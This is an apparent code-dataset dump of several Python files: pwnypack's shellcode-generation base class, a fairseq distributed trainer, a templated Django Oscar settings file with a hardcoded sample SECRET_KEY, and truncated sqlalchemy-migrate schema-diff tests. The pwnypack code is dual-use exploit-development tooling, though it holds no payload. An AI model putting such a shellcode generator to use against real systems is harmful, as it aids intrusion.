gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from enum import IntEnum
import functools
from kwonly_args import first_kwonly_arg
import six
import pwnypack.asm
from pwnypack.shellcode.ops import SyscallInvoke, LoadRegister
from pwnypack.shellcode.translate import translate
from pwnypack.shellcode.types import Register, Offset, Buffer
__all__ = ['BaseEnvironment']
class BaseEnvironment(object):
"""
The abstract base for all shellcode environments.
"""
class TranslateOutput(IntEnum):
"""
Output format the translate function.
"""
code = 0 #: Emit binary, executable code.
assembly = 1 #: Emit assembly source.
meta = 2 #: Emit the declarative version of the translated function.
@property
def PREAMBLE(self):
raise NotImplementedError('Target does not define a preamble')
@property
def REGISTER_WIDTH_MAP(self):
raise NotImplementedError('Target does not define a register width map')
REGISTER_WIDTH = None #: Mapping of register -> width, filled by __init__ based on REGISTER_WIDTH_MAP
@property
def STACK_REG(self):
raise NotImplementedError('Target does not define a stack register')
@property
def OFFSET_REG(self):
raise NotImplementedError('Target does not define an offset register')
@property
def TEMP_REG(self):
raise NotImplementedError('Target does not define a temporary register mapping')
@property
def SYSCALL_RET_REG(self):
raise NotImplementedError('Target does not define a syscall return register')
def __init__(self):
if self.REGISTER_WIDTH is None:
self.REGISTER_WIDTH = dict([
(reg_, width)
for (width, regs) in self.REGISTER_WIDTH_MAP.items()
for reg_ in regs
])
self.data = OrderedDict()
self.buffers = []
@property
def target(self):
raise NotImplementedError('Target does not define a target architecture')
def _alloc_data(self, bytes):
offset, _ = self.data.get(bytes, (None, None))
if offset is not None:
return offset
offset = Offset(sum(len(b) for b in six.iterkeys(self.data))) if self.data else Offset(0)
self.data[bytes] = (offset, bytes)
return offset
def alloc_data(self, value):
"""
Allocate a piece of data that will be included in the shellcode body.
Arguments:
value(...): The value to add to the shellcode. Can be bytes or
string type.
Returns:
~pwnypack.types.Offset: The offset used to address the data.
"""
if isinstance(value, six.binary_type):
return self._alloc_data(value)
elif isinstance(value, six.text_type):
return self._alloc_data(value.encode('utf-8') + b'\0')
else:
raise TypeError('No idea how to encode %s' % repr(value))
def alloc_buffer(self, length):
"""
Allocate a buffer (a range of uninitialized memory).
Arguments:
length(int): The length of the buffer to allocate.
Returns:
~pwnypack.types.Buffer: The object used to address this buffer.
"""
buf = Buffer(sum(len(v) for v in six.iterkeys(self.data)) + sum(v.length for v in self.buffers), length)
self.buffers.append(buf)
return buf
def reg_push(self, reg):
raise NotImplementedError('Target does not define reg_push')
def reg_pop(self, reg):
raise NotImplementedError('Target does not define reg_pop')
def reg_add_imm(self, reg, imm):
raise NotImplementedError('Target does not define reg_add_imm')
def reg_sub_imm(self, reg, imm):
raise NotImplementedError('Target does not define reg_sub_imm')
def reg_add_reg(self, reg1, reg2):
raise NotImplementedError('Target does not define reg_add_reg')
def reg_sub_reg(self, reg1, reg2):
raise NotImplementedError('Target does not define reg_add_reg')
def reg_load_imm(self, reg, value):
raise NotImplementedError('Target does not define reg_load_imm')
def reg_load_reg(self, reg1, reg2):
raise NotImplementedError('Target does not define reg_load_reg')
def reg_load_offset(self, reg, offset):
raise NotImplementedError('Target does not define reg_load_offset')
def jump_reg(self, reg):
raise NotImplementedError('Target does not define a jump to register method')
def syscall(self, op):
raise NotImplementedError('Target does not define syscall method')
def data_finalizer(self, code, data):
raise NotImplementedError('Target does not define a data finalizer')
def reg_load_array(self, reg, value):
temp_reg = self.TEMP_REG[self.target.bits]
code = []
if value:
for item in reversed(value):
if isinstance(item, (six.text_type, six.binary_type)):
item = self.alloc_data(item)
if isinstance(item, Offset) and not item:
item = self.OFFSET_REG
if not isinstance(item, Register):
code.extend(self.reg_load(temp_reg, item))
item = temp_reg
code.extend(self.reg_push(item))
code.extend(self.reg_load(reg, self.STACK_REG))
return code
def reg_load(self, reg, value):
"""
Load a value into a register. The value can be a string or binary (in
which case the value is passed to :meth:`alloc_data`), another
:class:`Register`, an :class:`Offset` or :class:`Buffer`, an integer
immediate, a ``list`` or ``tuple`` or a syscall invocation.
Arguments:
reg(pwnypack.shellcode.types.Register): The register to load the
value into.
value: The value to load into the register.
Returns:
list: A list of mnemonics that will load value into reg.
"""
if isinstance(value, (six.text_type, six.binary_type)):
value = self.alloc_data(value)
if value is None:
return self.reg_load_imm(reg, 0)
elif isinstance(value, Register):
if reg is not value:
return self.reg_load_reg(reg, value)
else:
return []
elif isinstance(value, Offset):
if value:
return self.reg_load_offset(reg, value)
else:
return self.reg_load(reg, self.OFFSET_REG)
elif isinstance(value, Buffer):
return self.reg_load_offset(reg, sum(len(v) for v in six.iterkeys(self.data)) + value.offset)
elif isinstance(value, six.integer_types):
reg_width = self.REGISTER_WIDTH[reg]
if value < -2 ** (reg_width-1):
raise ValueError('%d does not fit %s' % (value, reg))
elif value >= 2 ** reg_width:
raise ValueError('%d does not fit %s' % (value, reg))
return self.reg_load_imm(reg, value)
elif isinstance(value, (list, tuple)):
return self.reg_load_array(reg, value)
elif isinstance(value, SyscallInvoke):
return self.syscall(value) + self.reg_load(reg, self.SYSCALL_RET_REG)
else:
raise TypeError('Invalid argument type "%s"' % repr(value))
def reg_add(self, reg, value):
"""
Add a value to a register. The value can be another :class:`Register`,
an :class:`Offset`, a :class:`Buffer`, an integer or ``None``.
Arguments:
reg(pwnypack.shellcode.types.Register): The register to add the
value to.
value: The value to add to the register.
Returns:
list: A list of mnemonics that will add ``value`` to ``reg``.
"""
if value is None:
return []
elif isinstance(value, Register):
return self.reg_add_reg(reg, value)
elif isinstance(value, (Buffer, six.integer_types)):
if isinstance(reg, Buffer):
value = sum(len(v) for v in six.iterkeys(self.data)) + value.offset
if not value:
return []
reg_width = self.REGISTER_WIDTH[reg]
if value < -2 ** (reg_width-1):
raise ValueError('%d does not fit %s' % (value, reg))
elif value >= 2 ** reg_width:
raise ValueError('%d does not fit %s' % (value, reg))
if value > 0:
return self.reg_add_imm(reg, value)
else:
return self.reg_sub_imm(reg, -value)
else:
raise ValueError('Invalid argument type "%s"' % repr(value))
def reg_sub(self, reg, value):
if value is None:
return []
elif isinstance(value, Register):
return self.reg_sub_reg(reg, value)
elif isinstance(value, Buffer):
value = sum(len(v) for v in six.iterkeys(self.data)) + value.offset
return self.reg_add(reg, -value)
elif isinstance(value, six.integer_types):
return self.reg_add(reg, -value)
else:
raise ValueError('Invalid argument type "%s"' % repr(value))
def finalize(self, code):
return self.PREAMBLE + code
def compile(self, ops):
"""
Translate a list of operations into its assembler source.
Arguments:
ops(list): A list of shellcode operations.
Returns:
str: The assembler source code that implements the shellcode.
"""
def _compile():
code = []
for op in ops:
if isinstance(op, SyscallInvoke):
code.extend(self.syscall(op))
elif isinstance(op, LoadRegister):
code.extend(self.reg_load(op.register, op.value))
elif isinstance(op, str):
code.extend(op.split('\n'))
else:
raise ValueError('No idea how to assemble "%s"' % repr(op))
return ['\t%s' % line for line in code]
# We do 2 passes to make sure all data is allocated so buffers point at the right offset.
_compile()
return '\n'.join(self.finalize(self.data_finalizer(_compile(), self.data))) + '\n'
def assemble(self, ops):
"""
Assemble a list of operations into executable code.
Arguments:
ops(list): A list of shellcode operations.
Returns:
bytes: The executable code that implements the shellcode.
"""
return pwnypack.asm.asm(self.compile(ops), target=self.target)
@classmethod
@first_kwonly_arg('output')
def translate(cls, f=None, output=0, **kwargs):
"""translate(f=None, *, output=TranslateOutput.code, **kwargs)
Decorator that turns a function into a shellcode emitting function.
Arguments:
f(callable): The function to decorate. If ``f`` is ``None`` a
decorator will be returned instead.
output(~pwnypack.shellcode.base.BaseEnvironment.TranslateOutput): The output
format the shellcode function will produce.
**kwargs: Keyword arguments are passed to shellcode environment
constructor.
Returns:
A decorator that will translate the given function into a
shellcode generator
Examples:
>>> from pwny import *
>>> @sc.LinuxX86Mutable.translate
... def shellcode():
... sys_exit(0)
>>> @sc.LinuxX86Mutable.translate(output=1)
... def shellcode():
... sys_exit(0)
"""
def decorator(f):
@functools.wraps(f)
def proxy(*p_args, **p_kwargs):
env = cls(**kwargs)
result = translate(env, f, *p_args, **p_kwargs)
if output == cls.TranslateOutput.code:
return env.assemble(result)
elif output == cls.TranslateOutput.assembly:
return env.target, env.compile(result)
else:
return env, result
return proxy
if f is None:
return decorator
else:
return decorator(f)
|
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Train a network across multiple GPUs.
"""
from collections import defaultdict, OrderedDict
import contextlib
from itertools import chain
import torch
import apex_C
from fairseq import distributed_utils, optim, utils
from fairseq.meters import AverageMeter, TimeMeter
from fairseq.optim import lr_scheduler
class Trainer(object):
"""Main class for data parallel training.
This class supports data parallel training, where multiple workers each
have a full model replica and gradients are accumulated synchronously via
torch.distributed.all_reduce.
"""
def __init__(self, args, task, model, criterion, allreduce_communicators=None):
if not torch.cuda.is_available():
raise NotImplementedError('Training on CPU is not supported')
self.args = args
# copy model and criterion to current device
self.task = task
self.model = model.cuda()
self.criterion = criterion.cuda()
# initialize meters
self.meters = OrderedDict()
self.meters['train_loss'] = AverageMeter()
self.meters['train_nll_loss'] = AverageMeter()
self.meters['valid_loss'] = AverageMeter()
self.meters['valid_nll_loss'] = AverageMeter()
self.meters['wps'] = TimeMeter() # words per second
self.meters['ups'] = TimeMeter() # updates per second
self.meters['wpb'] = AverageMeter() # words per batch
self.meters['bsz'] = AverageMeter() # sentences per batch
self.meters['gnorm'] = AverageMeter() # gradient norm
self.meters['clip'] = AverageMeter() # % of updates clipped
self.meters['oom'] = AverageMeter() # out of memory
self.meters['wall'] = TimeMeter() # wall time in seconds
self._buffered_stats = defaultdict(lambda: [])
self._flat_grads = None
self._num_updates = 0
self._optim_history = None
self._optimizer = None
self._last_step = False
if self.args.enable_parallel_backward_allred_opt and not self.args.distributed_world_size > 1:
raise RuntimeError('--enable-parallel-backward-allred-opt is only meant for distributed training')
if self.args.enable_parallel_backward_allred_opt and not self.args.fp16:
raise RuntimeError('--enable-parallel-backward-allred-opt only works with FP16 training')
# rework all_gather_list implementation to mitigate memcpy overheads
# [sample_sizes,nsentences,loss,nll_loss,ooms_fwd,ooms_bwd]
self._all_reduce_list = [0.0] * 6
@property
def optimizer(self):
if self._optimizer is None:
self._build_optimizer()
return self._optimizer
def _build_optimizer(self):
self._optimizer = optim.build_optimizer(self.args, self.model.parameters())
self.lr_scheduler = lr_scheduler.build_lr_scheduler(self.args, self._optimizer)
def save_checkpoint(self, filename, extra_state):
"""Save all training state in a checkpoint file."""
if distributed_utils.is_master(self.args): # only save one checkpoint
extra_state['train_meters'] = self.meters
utils.save_state(
filename, self.args, self.model, self.criterion, self.optimizer,
self.lr_scheduler, self._num_updates, self._optim_history, extra_state,
)
def load_checkpoint(self, filename, load_optim=True):
"""Load all training state from a checkpoint file."""
extra_state, optim_history, last_optim_state = \
utils.load_model_state(filename, self.model)
if last_optim_state is not None:
# rebuild optimizer after loading model, since params may have changed
self._build_optimizer()
if load_optim:
self._optim_history = optim_history
# only reload optimizer and lr_scheduler if they match
last_optim = self._optim_history[-1]
if last_optim['criterion_name'] == self.criterion.__class__.__name__:
self.lr_scheduler.load_state_dict(last_optim['lr_scheduler_state'])
if last_optim['optimizer_name'] == self.optimizer.__class__.__name__:
self.optimizer.load_state_dict(last_optim_state)
self._num_updates = last_optim['num_updates']
if extra_state is not None and 'train_meters' in extra_state:
self.meters = extra_state['train_meters']
del extra_state['train_meters']
return extra_state
def train_step(self, sample, update_params=True, last_step=False):
"""Do forward, backward and parameter update."""
# Set seed based on args.seed and the update number so that we get
# reproducible results when resuming from checkpoints
seed = self.args.seed + self.get_num_updates()
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
self._last_step = last_step
# forward and backward pass
sample = self._prepare_sample(sample)
loss, sample_size, logging_output, oom_fwd = self._forward(sample)
oom_bwd = self._backward(loss)
# buffer stats and logging outputs
self._buffered_stats['sample_sizes'].append(sample_size)
self._buffered_stats['logging_outputs'].append(logging_output)
self._buffered_stats['ooms_fwd'].append(oom_fwd)
self._buffered_stats['ooms_bwd'].append(oom_bwd)
# rework all_gather_list
assert(sample_size == logging_output.get('sample_size', 0.0))
assert(sample_size == logging_output.get('ntokens', 0.0))
self._all_reduce_list[0] += sample_size
self._all_reduce_list[1] += logging_output.get('nsentences', 0.0)
self._all_reduce_list[2] += logging_output.get('loss', 0.0)
self._all_reduce_list[3] += logging_output.get('nll_loss', 0.0)
self._all_reduce_list[4] += oom_fwd
self._all_reduce_list[5] += oom_bwd
# update parameters
if update_params:
check_against_old_code = False
# check_against_old_code = True
if check_against_old_code:
# gather logging outputs from all replicas
sample_sizes = self._buffered_stats['sample_sizes']
logging_outputs = self._buffered_stats['logging_outputs']
ooms_fwd = self._buffered_stats['ooms_fwd']
ooms_bwd = self._buffered_stats['ooms_bwd']
# print(sample_sizes,logging_outputs,ooms_fwd,ooms_bwd)
if self.args.distributed_world_size > 1:
sample_sizes, logging_outputs, ooms_fwd, ooms_bwd = map(
lambda l: list(chain.from_iterable(l)),
zip(*distributed_utils.all_gather_list(
(sample_sizes, logging_outputs, ooms_fwd, ooms_bwd)
))
)
# print("\n",sample_sizes, logging_outputs, ooms_fwd, ooms_bwd)
ooms_fwd = sum(ooms_fwd)
ooms_bwd = sum(ooms_bwd)
if ooms_fwd == self.args.distributed_world_size:
print('| WARNING: OOM in all workers, skipping batch')
self.zero_grad()
return None
# aggregate stats and logging outputs
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
agg_logging_output = self.criterion.__class__.aggregate_logging_outputs(logging_outputs)
grad_denom = self.criterion.__class__.grad_denom(sample_sizes)
assert( grad_denom == sum(sample_sizes) )
assert( grad_denom == ntokens )
assert( grad_denom == agg_logging_output['sample_size'] )
all_gather_list_tensor = torch.cuda.DoubleTensor([grad_denom, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd])
print("\n",all_gather_list_tensor)
# rework all_gather_list
all_reduce_list_tensor = torch.cuda.DoubleTensor(self._all_reduce_list)
if self.args.distributed_world_size > 1:
torch.distributed.all_reduce(all_reduce_list_tensor)
all_reduce_list_tensor[2:4].div_((all_reduce_list_tensor[0:1]*torch.log(torch.cuda.DoubleTensor([2]))))
if check_against_old_code:
print(all_reduce_list_tensor)
assert(grad_denom == all_reduce_list_tensor[0].item())
assert(nsentences == all_reduce_list_tensor[1].item())
# compare loss values
# print(all_gather_list_tensor[2:4] - all_reduce_list_tensor[2:4])
assert(torch.all(torch.lt(torch.abs(torch.add(all_gather_list_tensor[2:4], -all_reduce_list_tensor[2:4])), 1e-12)))
assert(ooms_fwd == all_reduce_list_tensor[4].item())
assert(ooms_bwd == all_reduce_list_tensor[5].item())
agg_logging_output = {}
[grad_denom, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd] = all_reduce_list_tensor.tolist()
agg_logging_output['sample_size'] = all_reduce_list_tensor[0].item()
ntokens = grad_denom
# print([grad_denom, ntokens, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd])
if ooms_fwd == self.args.distributed_world_size:
print('| WARNING: OOM in all workers, skipping batch')
self.zero_grad()
return None
try:
# all-reduce and rescale gradients, then take an optimization step
# grad_norm = self._all_reduce_and_rescale(grad_denom, sample is not None)
grad_norm = self._all_reduce_and_rescale(all_reduce_list_tensor[0].item(), sample is not None)
self._opt()
# update meters
self.meters['wps'].update(ntokens)
self.meters['ups'].update(1.)
self.meters['wpb'].update(ntokens)
self.meters['bsz'].update(nsentences)
if grad_norm is not None:
self.meters['gnorm'].update(grad_norm)
self.meters['clip'].update(1. if grad_norm > self.args.clip_norm else 0.)
self.meters['oom'].update(ooms_fwd + ooms_bwd)
# update loss meters for training
if 'loss' in agg_logging_output:
self.meters['train_loss'].update(agg_logging_output['loss'], grad_denom)
# criterions can optionally log the NLL loss too
if 'nll_loss' in agg_logging_output:
self.meters['train_nll_loss'].update(agg_logging_output['nll_loss'], ntokens)
except OverflowError as e:
self.zero_grad()
print('| WARNING: overflow detected, ' + str(e))
self.clear_buffered_stats()
return agg_logging_output
else:
return None # buffering updates
def _forward(self, sample, eval=False):
loss = None
sample_size = 0
logging_output = {
'ntokens': sample['ntokens'] if sample is not None else 0,
'nsentences': sample['target'].size(0) if sample is not None else 0,
}
oom = 0
try:
# prepare model and optimizer
if eval:
self.model.eval()
else:
self.model.train()
if sample is not None:
with torch.no_grad() if eval else contextlib.ExitStack():
# calculate loss and sample size
loss, sample_size, logging_output_ = self.task.get_loss(self.model, self.criterion, sample)
logging_output.update(logging_output_)
except RuntimeError as e:
if not eval and 'out of memory' in str(e):
print('| WARNING: ran out of memory, skipping batch')
oom = 1
loss = None
else:
raise e
return loss, sample_size, logging_output, oom
def _backward(self, loss):
oom = 0
if loss is not None:
try:
# backward pass
loss.backward()
except RuntimeError as e:
if 'out of memory' in str(e):
print('| WARNING: ran out of memory, skipping batch')
oom = 1
self.zero_grad()
else:
raise e
return oom
def _all_reduce_and_rescale(self, grad_denom, non_empty = True):
# flatten grads into a single buffer and all-reduce
flat_grads = self._flat_grads = self._get_flat_grads(out=self._flat_grads, has_grad = non_empty)
if self.args.distributed_world_size > 1:
torch.distributed.all_reduce(flat_grads)
# rescale and clip gradients
flat_grads.div_(grad_denom)
grad_norm = utils.clip_grad_norm_(flat_grads, self.args.clip_norm)
# copy grads back into model parameters
self._set_flat_grads(flat_grads)
return grad_norm
def _get_grads(self, has_grad = True):
grads = []
for name, p in self.model.named_parameters():
if not p.requires_grad:
continue
if p.grad is None:
if has_grad:
raise RuntimeError('Model parameter did not receive gradient: ' + name + '. '
'Use the param in the forward pass or set requires_grad=False')
else:
p.grad = torch.zeros_like(p)
grads.append(p.grad.data)
return grads
def _get_flat_grads(self, out=None, has_grad = True):
grads = self._get_grads(has_grad)
#if out is None:
# grads_size = sum(g.numel() for g in grads)
# out = grads[0].new(grads_size).zero_()
#offset = 0
#for g in grads:
# numel = g.numel()
# out[offset:offset+numel].copy_(g.view(-1))
# offset += numel
#return out[:offset]
return apex_C.flatten(grads)
def _set_flat_grads(self, new_grads):
grads = self._get_grads()
offset = 0
for g in grads:
numel = g.numel()
g.copy_(new_grads[offset:offset+numel].view_as(g))
offset += numel
def _opt(self):
# take an optimization step
self.optimizer.step()
self.zero_grad()
self._num_updates += 1
# update learning rate
self.lr_scheduler.step_update(self._num_updates)
def valid_step(self, sample):
"""Do forward pass in evaluation mode."""
# forward pass
sample = self._prepare_sample(sample)
_loss, sample_size, logging_output, oom_fwd = self._forward(sample, eval=True)
assert not oom_fwd, 'Ran out of memory during validation'
# gather logging outputs from all GPUs
if self.args.distributed_world_size > 1:
sample_sizes, logging_outputs = zip(*distributed_utils.all_gather_list(
(sample_size, logging_output)
))
else:
sample_sizes = [sample_size]
logging_outputs = [logging_output]
# aggregate stats and logging outputs
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
grad_denom = self.criterion.__class__.grad_denom(sample_sizes)
agg_logging_output = self.criterion.__class__.aggregate_logging_outputs(logging_outputs)
# update loss meters for validation
if 'loss' in agg_logging_output:
self.meters['valid_loss'].update(agg_logging_output['loss'], grad_denom)
# criterions can optionally log the NLL loss too
if 'nll_loss' in agg_logging_output:
self.meters['valid_nll_loss'].update(agg_logging_output['nll_loss'], ntokens)
return agg_logging_output
def dummy_train_step(self, dummy_batch):
"""Dummy training step for warming caching allocator."""
self.train_step(dummy_batch, update_params=False)
self.zero_grad()
self.clear_buffered_stats()
def zero_grad(self):
self.optimizer.zero_grad()
def clear_buffered_stats(self):
self._buffered_stats.clear()
self._all_reduce_list = [0.0] * 6
def lr_step(self, epoch, val_loss=None):
"""Adjust the learning rate based on the validation loss."""
return self.lr_scheduler.step(epoch, val_loss)
def lr_step_update(self, num_updates):
"""Update the learning rate after each update."""
return self.lr_scheduler.step_update(num_updates)
def get_lr(self):
"""Get the current learning rate."""
return self.optimizer.get_lr()
def get_model(self):
"""Get the model replica."""
return self.model
def get_meter(self, name):
"""Get a specific meter by name."""
if name not in self.meters:
return None
return self.meters[name]
def get_num_updates(self):
"""Get the number of parameters updates."""
return self._num_updates
def _prepare_sample(self, sample):
if sample is None or len(sample) == 0:
return None
return utils.move_to_cuda(sample)
|
|
import os
# Django settings for oscar project.
PROJECT_DIR = os.path.dirname(__file__)
location = lambda x: os.path.join(os.path.dirname(os.path.realpath(__file__)), x)
DEBUG = True
TEMPLATE_DEBUG = True
SQL_DEBUG = True
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
USE_TZ = True
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
# Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': location('db.sqlite'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
ATOMIC_REQUESTS = True
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
gettext_noop = lambda s: s
LANGUAGES = (
('en-gb', gettext_noop('British English')),
('zh-cn', gettext_noop('Simplified Chinese')),
('zh-tw', gettext_noop('Taiwan Chinese')),
('nl', gettext_noop('Dutch')),
('it', gettext_noop('Italian')),
('pl', gettext_noop('Polish')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('fr', gettext_noop('French')),
('de', gettext_noop('German')),
('ko', gettext_noop('Korean')),
('uk', gettext_noop('Ukrainian')),
('es', gettext_noop('Spanish')),
('da', gettext_noop('Danish')),
('ar', gettext_noop('Arabic')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('el', gettext_noop('Greek')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = location("public/media")
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
# ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/static/'
STATIC_ROOT = location('public')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '$)a7n&o80u!6y5t-+jrd3)3!%vh&shg$wqpjpxc!ar&p#!)n1a'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# needed by django-treebeard for admin (and potentially other libs)
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
# Oscar specific
'oscar.apps.search.context_processors.search_form',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
)
MIDDLEWARE_CLASSES = (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# Allow languages to be selected
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
# Ensure a valid basket is added to the request instance for every request
'oscar.apps.basket.middleware.BasketMiddleware',
# Enable the ProfileMiddleware, then add ?cprofile to any
# URL path to print out profile details
#'oscar.profiling.middleware.ProfileMiddleware',
)
INTERNAL_IPS = ('127.0.0.1',)
ROOT_URLCONF = 'urls'
from oscar import OSCAR_MAIN_TEMPLATE_DIR
TEMPLATE_DIRS = (
location('templates'),
os.path.join(OSCAR_MAIN_TEMPLATE_DIR, 'templates'),
OSCAR_MAIN_TEMPLATE_DIR,
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
},
},
'loggers': {
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'oscar.checkout': {
'handlers': ['console'],
'propagate': True,
'level': 'INFO',
},
'django.db.backends': {
'handlers': ['null'],
'propagate': False,
'level': 'DEBUG',
},
'paypal.express': {
'handlers': ['console'],
'propagate': True,
'level': 'DEBUG',
},
'paypal.payflow': {
'handlers': ['console'],
'propagate': True,
'level': 'DEBUG',
},
}
}
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.staticfiles',
# External apps
'django_extensions',
'debug_toolbar',
# Apps from oscar
'compressor',
'widget_tweaks',
'<%= packagename %>',
]
from oscar import get_core_apps
INSTALLED_APPS = INSTALLED_APPS + get_core_apps([])
AUTHENTICATION_BACKENDS = (
'oscar.apps.customer.auth_backends.Emailbackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_REDIRECT_URL = '/accounts/'
APPEND_SLASH = True
# Oscar settings
from oscar.defaults import *
OSCAR_ALLOW_ANON_CHECKOUT = True
# Add Payflow dashboard stuff to settings
from django.utils.translation import ugettext_lazy as _
# Haystack settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
########## <%= capitalizePackagename %> CONFIGRATION
OSCAR_DASHBOARD_NAVIGATION.append(
{
'label': _('<%= capitalizePackagename %>'),
'icon': 'icon-info',
'children': [
{
'label': '<%= capitalizePackagename %>',
'url_name': '<%= packagename %>-list',
},
]
})
########## END HOOK CONFIGRATION
|
|
# -*- coding: utf-8 -*-
import os
from sqlalchemy import *
from nose.tools import eq_
from migrate.versioning import schemadiff
from migrate.changeset import SQLA_06
from migrate.tests import fixture
class SchemaDiffBase(fixture.DB):
level = fixture.DB.CONNECT
def _make_table(self,*cols,**kw):
self.table = Table('xtable', self.meta,
Column('id',Integer(), primary_key=True),
*cols
)
if kw.get('create',True):
self.table.create()
def _assert_diff(self,col_A,col_B):
self._make_table(col_A)
self.meta.clear()
self._make_table(col_B,create=False)
diff = self._run_diff()
# print diff
self.assertTrue(diff)
eq_(1,len(diff.tables_different))
td = diff.tables_different.values()[0]
eq_(1,len(td.columns_different))
cd = td.columns_different.values()[0]
eq_(('Schema diffs:\n'
' table with differences: xtable\n'
' column with differences: data\n'
' model: %r\n'
' database: %r')%(
cd.col_A,
cd.col_B
),str(diff))
class Test_getDiffOfModelAgainstDatabase(SchemaDiffBase):
def _run_diff(self,**kw):
return schemadiff.getDiffOfModelAgainstDatabase(
self.meta, self.engine, **kw
)
@fixture.usedb()
def test_table_missing_in_db(self):
self._make_table(create=False)
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n tables missing from database: xtable',
str(diff))
@fixture.usedb()
def test_table_missing_in_model(self):
self._make_table()
self.meta.clear()
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n tables missing from model: xtable',
str(diff))
@fixture.usedb()
def test_column_missing_in_db(self):
# db
Table('xtable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
self.meta.clear()
# model
self._make_table(
Column('xcol',Integer()),
create=False
)
# run diff
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n'
' table with differences: xtable\n'
' database missing these columns: xcol',
str(diff))
@fixture.usedb()
def test_column_missing_in_model(self):
# db
self._make_table(
Column('xcol',Integer()),
)
self.meta.clear()
# model
self._make_table(
create=False
)
# run diff
diff = self._run_diff()
self.assertTrue(diff)
eq_('Schema diffs:\n'
' table with differences: xtable\n'
' model missing these columns: xcol',
str(diff))
@fixture.usedb()
def test_exclude_tables(self):
# db
Table('ytable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
Table('ztable', self.meta,
Column('id',Integer(), primary_key=True),
).create()
self.meta.clear()
# model
self._make_table(
create=False
)
Table('ztable', self.meta,
Column('id',Integer(), primary_key=True),
)
# run diff
